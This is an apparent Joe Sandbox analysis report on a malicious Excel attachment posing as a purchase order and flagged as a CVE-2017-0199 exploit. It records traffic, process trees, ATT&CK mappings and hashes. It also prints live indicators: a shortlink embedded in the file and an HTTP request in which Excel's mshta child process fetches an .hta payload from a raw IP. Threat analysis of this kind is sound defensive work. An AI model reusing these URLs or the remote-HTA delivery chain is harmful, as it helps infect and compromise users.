Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global traffic, TCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global traffic, TCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global traffic, TCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global traffic, TCP traffic: 13.107.246.41:443 -> 192.168.2.7:49702
Source: global traffic, TCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global traffic, TCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: Joe Sandbox View, IP Address: 147.79.86.93 147.79.86.93
Source: Joe Sandbox View, IP Address: 13.107.246.41 13.107.246.41
Source: Joe Sandbox View, JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 13.107.246.41:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 13.107.246.41:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 13.107.246.41:443
Source: global traffic, HTTP traffic detected: GET /vJcD8F?&silk=enthusiastic HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: agr.my
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Connection: Keep-Alive
    Host: 172.245.123.32
Source: unknown, TCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
    Host: otelrules.svc.static.microsoft
Source: global traffic, HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
    Host: otelrules.svc.static.microsoft
Source: global traffic, HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
    Host: otelrules.svc.static.microsoft
Source: global traffic, DNS traffic detected: DNS query: agr.my
Source: global traffic, DNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: PURCHASE ORDER 517-2025.xla.xlsx, String found in binary or memory: https://agr.my/vJcD8F?&silk=enthusiastic
Source: unknown, Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown, Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown, HTTPS traffic detected: 147.79.86.93:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: PURCHASE ORDER 517-2025.xla.xlsx, OLE indicator, VBA macros: true
Source: PURCHASE ORDER 517-2025.xla.xlsxStream path 'MBD001A3106/\x1Ole' : https://agr.my/vJcD8F?&silk=enthusiasticm=V&2G"aFzBv+\7dcUkO{u,8K| sf'.Q\R<eJ1rlmdht!c<%)Fw`7^6eLLyklcWgQbVIv9OQFIJt6VUMHZGTpa4tV5k0bivr6OqxyUCfDUv71OQ6Fn89wBodWoYxY3PDmNL8FqnGSiekrbLeCQx6f4EZMajhTVxArQoC9XTYtchiizBP1dO3CpAh9072utPLqr1JfjPyidRlP7a2gsgTJ25ywynXrmOKCKLE\"txQUB<z_VmkJ_
Source: C:\Windows\SysWOW64\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Window title found: microsoft excel okexcel cannot open the file 'purchase order 517-2025.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engine, Classification label: mal56.expl.winXLSX@6/4@2/3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File created: C:\Users\user\Desktop\~$PURCHASE ORDER 517-2025.xla.xlsx
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File created: C:\Users\user~1\AppData\Local\Temp\{D8FC13E0-A622-4B63-B0D5-9A6942AE1FCA} - OProcSessId.dat
Source: PURCHASE ORDER 517-2025.xla.xlsx, OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PURCHASE ORDER 517-2025.xla.xlsx, Virustotal: Detection: 31%
Source: PURCHASE ORDER 517-2025.xla.xlsx, ReversingLabs: Detection: 22%
Source: unknown, Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown, Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 517-2025.xla.xlsx"
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: c2r32.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: PURCHASE ORDER 517-2025.xla.xlsx, Static file information: File size 1064448 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: PURCHASE ORDER 517-2025.xla.xlsx, Initial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: PURCHASE ORDER 517-2025.xla.xlsx; Stream path 'MBD001A3105/Package' entropy: 7.99329796897 (max. 8.0)
Source: PURCHASE ORDER 517-2025.xla.xlsx; Stream path 'Workbook' entropy: 7.99208997378 (max. 8.0)
Source: C:\Windows\splwow64.exe; Window / User API: threadDelayed 978
Source: C:\Windows\splwow64.exe; Last function: Thread delayed
Source: C:\Windows\splwow64.exe; Thread delayed: delay time: 120000
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information queried: ProcessInformation
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 13 Exploitation for Client Execution | 1 Scripting | 1 Process Injection | 2 Masquerading | OS Credential Dumping | 1 Process Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Process Injection | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Behavior Graph (ID: 1649448). Sample: PURCHASE ORDER 517-2025.xla.xlsx; Startdate: 26/03/2025; Architecture: WINDOWS; Score: 56
Signatures: Multi AV Scanner detection for submitted file; Document exploit detected (process start blacklist hit); Sigma detected: Suspicious Microsoft Office Child Process
Processes: EXCEL.EXE (started; started splwow64.exe and mshta.exe; dropped C:\...\~$PURCHASE ORDER 517-2025.xla.xlsx, data); EXCEL.EXE (started)
DNS/IP: star-azurefd-prod.trafficmanager.net; shed.dual-low.s-part-0013.t-0009.t-msedge.net; 4 other IPs or domains; s-part-0013.t-0009.t-msedge.net 13.107.246.41, 443, 49699, 49701, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States; agr.my 147.79.86.93, 443, 49697, EKSENBILISIMTR, United States; 172.245.123.32, 49698, 80, AS-COLOCROSSINGUS, United States

Source | Detection | Scanner | Label
PURCHASE ORDER 517-2025.xla.xlsx | 31% | Virustotal |
PURCHASE ORDER 517-2025.xla.xlsx | 22% | ReversingLabs | Document-Excel.Exploit.CVE-2017-0199
No Antivirus matches
Source | Detection | Scanner | Label
https://agr.my/vJcD8F?&silk=enthusiastic | 0% | Avira URL Cloud | safe
http://172.245.123.32/xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
agr.my | 147.79.86.93 | true | false | | high
s-part-0013.t-0009.t-msedge.net | 13.107.246.41 | true | false | | high
s-0005.dual-s-dc-msedge.net | 52.123.130.14 | true | false | | high
otelrules.svc.static.microsoft | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundle | false | | high
http://172.245.123.32/xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal | false | Avira URL Cloud: safe | unknown
https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xml | false | | high
https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xml | false | | high
https://agr.my/vJcD8F?&silk=enthusiastic | false | Avira URL Cloud: safe | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
147.79.86.93 | agr.my | United States | 208485 | EKSENBILISIMTR | false
13.107.246.41 | s-part-0013.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
172.245.123.32 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1649448
Start date and time: 2025-03-26 19:46:35 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Without Instrumentation
Number of analysed new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PURCHASE ORDER 517-2025.xla.xlsx
Detection: MAL
Classification: mal56.expl.winXLSX@6/4@2/3
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Active ActiveX Object
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, MavInject32.exe
• Excluded IPs from analysis (whitelisted): 52.109.0.91, 23.9.183.29, 52.109.8.36, 23.210.73.5, 23.210.73.6, 104.208.16.90, 20.42.65.89, 52.123.130.14, 20.190.151.6, 20.12.23.50
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, osiprod-cus-buff-azsc-000.centralus.cloudapp.azure.com, login.live.com, wus-azsc-config.officeapps.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, onedscolprdcus14.centralus.cloudapp.azure.com, cus-azsc-000.roaming.officeapps.live.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, us1.roaming1.live.com.akadns.net, config.officeapps.live.com, us.configsv
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
14:48:38 | API Interceptor | 1005x Sleep call for process: splwow64.exe modified

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 118
Entropy (8bit): 3.5700810731231707
Encrypted: false
SSDEEP: 3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5: 573220372DA4ED487441611079B623CD
SHA1: 8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256: BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512: F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious: false
Reputation: high, very likely benign file
Preview: <?xml version="1.0" encoding="UTF-16"?> <HeartbeatCache/>

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 784
Entropy (8bit): 2.7137690747287806
Encrypted: false
SSDEEP: 24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
MD5: 09F73B3902CD3D88E04312787956B654
SHA1: A6C275F1A65DB02D8A752C614C27E88326447C41
SHA-256: 72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
SHA-512: 6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
Malicious: false
Reputation: moderate, very likely benign file
                                Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.
                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):512
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3::
                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                Malicious:false
                                Reputation:high, very likely benign file
                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):1.7769794087092887
                                Encrypted:false
                                SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                MD5:37BD8218D560948827D3B948CAFA579C
                                SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                Malicious:true
                                Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Mar 26 15:55:25 2025, Security: 1
                                Entropy (8bit):7.975743789189764
                                TrID:
                                • Microsoft Excel sheet (30009/1) 47.99%
                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                File name:PURCHASE ORDER 517-2025.xla.xlsx
                                File size:1'064'448 bytes
                                MD5:4d57f2dfe4050bf6605af3c1be23d9e2
                                SHA1:db1b4d7cd15f21378a456e7fdf49648b39ba731a
                                SHA256:2edf703005001488ac02fe1c1b08784c938d944a5e8dd4345b00ea3d6e7b68f6
                                SHA512:cb144e71faf5ef0582c4dcddf89cd0e4f264b3a6953309fd3d0e3294bbf3d8b45970c0a2362216f4acbf520e1a4647eb4b30bd4d7d94eb567c541f55be37e1cd
                                SSDEEP:24576:zJIwgAIb3nOXYXKFlevIBoyK6wueeBbJYvH:zzgh7O7FlegBoy1deCqvH
                                TLSH:C03523DABE947E53DB0B00B61B86C4AE540B7F9D264CE10B7634734A1537A6E80F583E
                                File Content Preview:........................>...................................E...........................................................................h......................................................................................................................
                                Icon Hash:35e58a8c0c8a85b9
                                Document Type:OLE
                                Number of OLE Files:1
                                Has Summary Info:
                                Application Name:Microsoft Excel
                                Encrypted Document:True
                                Contains Word Document Stream:False
                                Contains Workbook/Book Stream:True
                                Contains PowerPoint Document Stream:False
                                Contains Visio Document Stream:False
                                Contains ObjectPool Stream:False
                                Flash Objects Count:0
                                Contains VBA Macros:True
                                Code Page:1252
                                Author:
                                Last Saved By:
                                Create Time:2006-09-16 00:00:00
                                Last Saved Time:2025-03-26 15:55:25
                                Creating Application:Microsoft Excel
                                Security:1
                                Document Code Page:1252
                                Thumbnail Scaling Desired:False
                                Contains Dirty Links:False
                                Shared Document:False
                                Changed Hyperlinks:False
                                Application Version:786432
                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                VBA File Name:Sheet1.cls
                                Stream Size:977
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X < ^ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 58 3c 5e c3 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "Sheet1"
                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                VBA File Name:Sheet2.cls
                                Stream Size:977
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X < . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 58 3c 0b 02 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "Sheet2"
                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                VBA File Name:Sheet3.cls
                                Stream Size:977
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X < s . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
